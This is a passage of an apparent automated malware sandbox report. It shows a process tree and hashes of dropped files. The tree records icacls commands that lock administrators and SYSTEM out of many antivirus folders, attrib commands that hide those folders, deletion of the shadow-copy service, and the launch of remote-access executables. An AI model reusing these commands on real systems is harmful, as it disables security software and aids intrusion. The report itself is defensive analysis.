          C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
          PID:4596
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5772
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
          PID:3644
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5740
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
          PID:4944
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
            PID:5188
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          PID:5228
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5448
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
          PID:5652
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
            PID:4708
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
          PID:6052
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5780
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:5460
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:3988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
          PID:2832
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
          PID:2188
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
          PID:5436
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5112
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:5852
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:5576
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:6080
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3132
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:5568
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:4956
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:2432
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:5948
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:5884
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
            PID:4640
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
          PID:5916
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:4856
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:692
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:5676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
          PID:4768
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
            PID:6072
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
          PID:4584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:4352
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5484
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:5156
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            PID:4532
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:2204
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:1848
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
          PID:3564
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4896
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
          PID:5380
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4980
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:5544
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:5088
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
            PID:5936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
          PID:6008
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
            PID:4160
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
          PID:3692
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4836
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
          PID:5408
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3744
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:5804
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
          PID:5636
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
            PID:3500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:5976
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
          PID:584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
            PID:5360
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
          PID:5588
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
            PID:2200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          Drops file in Drivers directory
          PID:5900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
          PID:4740
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 5 /NOBREAK
            Delays execution with timeout.exe
            PID:6004
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 3 /NOBREAK
            Delays execution with timeout.exe
            PID:3008
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM 1.exe /T /F
            Kills process with taskkill
            PID:5756
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM P.exe /T /F
            Kills process with taskkill
            PID:2300
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:5132
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
          PID:5704
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM iediagcmd.exe /T /F
            Kills process with taskkill
            PID:5560
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5876
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5540
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:3136
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:6020
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\360\Total Security"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5524
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:3584
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360TotalSecurity
            Views/modifies file attributes
            PID:1892
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360safe
            Views/modifies file attributes
            PID:5184
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4412
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4868
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\Avira
            Views/modifies file attributes
            PID:4696
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4684
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Package Cache"
            Views/modifies file attributes
            PID:4900
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5960
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\ESET"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5216
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4404
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\ESET
            Views/modifies file attributes
            PID:4380
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4456
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:4268
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5180
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\AVAST Software"
            Views/modifies file attributes
            PID:6096
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4864
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
            Views/modifies file attributes
            PID:5964
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
            Views/modifies file attributes
            PID:4536
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:6112
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4036
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\AdwCleaner"
            Views/modifies file attributes
            PID:1160
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:3660
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:4396
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5412
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "c:\programdata\Malwarebytes"
            Views/modifies file attributes
            PID:5388
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:6084
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      PID:3948
      • C:\Windows\SysWOW64\sc.exe
        sc delete swprv
        PID:2104
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:904
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe
      Executes dropped EXE
      PID:204
      • C:\ProgramData\Windows\rfusclient.exe
        C:\ProgramData\Windows\rfusclient.exe /tray
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        PID:2460
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe /tray
      Executes dropped EXE
      PID:208
  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    Checks SCSI registry key(s)
    Modifies data under HKEY_USERS
    PID:3556

Network

Replay Monitor

00:00 00:00

Downloads

  • C:\Program Files\Common Files\System\iediagcmd.exe
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Program Files\Common Files\System\iexplore.exe
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\ProgramData\Microsoft\Check\Check.txt
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\ProgramData\Microsoft\Intel\BLOCK.bat
  • C:\ProgramData\Microsoft\Intel\R8.exe
    MD5

    ad95d98c04a3c080df33ed75ad38870f

    SHA1

    abbb43f7b7c86d7917d4582e47245a40ca3f33c0

    SHA256

    40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

    SHA512

    964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\ProgramData\Microsoft\Intel\taskhost.exe
    MD5

    5cf0195be91962de6f58481e15215ddd

    SHA1

    7b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6

    SHA256

    0b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d

    SHA512

    0df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4

  • C:\ProgramData\Microsoft\Intel\taskhost.exe
    MD5

    5cf0195be91962de6f58481e15215ddd

    SHA1

    7b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6

    SHA256

    0b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d

    SHA512

    0df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4

  • C:\ProgramData\Microsoft\Intel\wini.exe
    MD5

    098d7cf555f2bafd4535c8c245cf5e10

    SHA1

    b45daf862b6cbb539988476a0b927a6b8bb55355

    SHA256

    01e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a

    SHA512

    e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624

  • C:\ProgramData\Microsoft\Intel\wini.exe
    MD5

    098d7cf555f2bafd4535c8c245cf5e10

    SHA1

    b45daf862b6cbb539988476a0b927a6b8bb55355

    SHA256

    01e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a

    SHA512

    e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624

  • C:\ProgramData\RealtekHD\taskhostw.exe
    MD5

    73ca737af2c7168e9c926a27abf7a5b1

    SHA1

    05fd828fd58a64f25682845585f6565b7ca2fdb2

    SHA256

    99dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2

    SHA512

    de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172

  • C:\ProgramData\WindowsTask\MicrosoftHost.exe
    MD5

    a74ad3584394b0766ada52191b245013

    SHA1

    6b25f4ba2c86541d4e2e5872a63fa1005373966b

    SHA256

    1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737

    SHA512

    5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

  • C:\ProgramData\WindowsTask\MicrosoftHost.exe
    MD5

    a74ad3584394b0766ada52191b245013

    SHA1

    6b25f4ba2c86541d4e2e5872a63fa1005373966b

    SHA256

    1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737

    SHA512

    5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

  • C:\ProgramData\WindowsTask\audiodg.exe
    MD5

    93e02d14c17fbcc122e1854a570fdc53

    SHA1

    a8d460a2651327011e0d3d8cf89c7e6ecfa83b63

    SHA256

    fc85ad0cfc03cb9b89f82a16ba72b405a6dd52438e1071bfb38ef93116f9679b

    SHA512

    7caca72160d2446029a56f032b6d982a223760501ab104c2e090f5d6bc8c772d131813e191e6d771dce58cfa75616c1c375cc1e971f548573b95ecf11dfce5de

  • C:\ProgramData\WindowsTask\audiodg.exe
    MD5

    93e02d14c17fbcc122e1854a570fdc53

    SHA1

    a8d460a2651327011e0d3d8cf89c7e6ecfa83b63

    SHA256

    fc85ad0cfc03cb9b89f82a16ba72b405a6dd52438e1071bfb38ef93116f9679b

    SHA512

    7caca72160d2446029a56f032b6d982a223760501ab104c2e090f5d6bc8c772d131813e191e6d771dce58cfa75616c1c375cc1e971f548573b95ecf11dfce5de

  • C:\ProgramData\WindowsTask\winlogon.exe
    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\ProgramData\Windows\install.vbs
    MD5

    5e36713ab310d29f2bdd1c93f2f0cad2

    SHA1

    7e768cca6bce132e4e9132e8a00a1786e6351178

    SHA256

    cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

    SHA512

    8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

  • C:\ProgramData\Windows\reg1.reg
    MD5

    0bfedf7b7c27597ca9d98914f44ccffe

    SHA1

    e4243e470e96ac4f1e22bf6dcf556605c88faaa9

    SHA256

    7e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e

    SHA512

    d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d

  • C:\ProgramData\Windows\reg2.reg
    MD5

    6a5d2192b8ad9e96a2736c8b0bdbd06e

    SHA1

    235a78495192fc33f13af3710d0fe44e86a771c9

    SHA256

    4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

    SHA512

    411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

  • C:\ProgramData\Windows\rfusclient.exe
    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe
    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe
    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe
    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rutserv.exe
    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

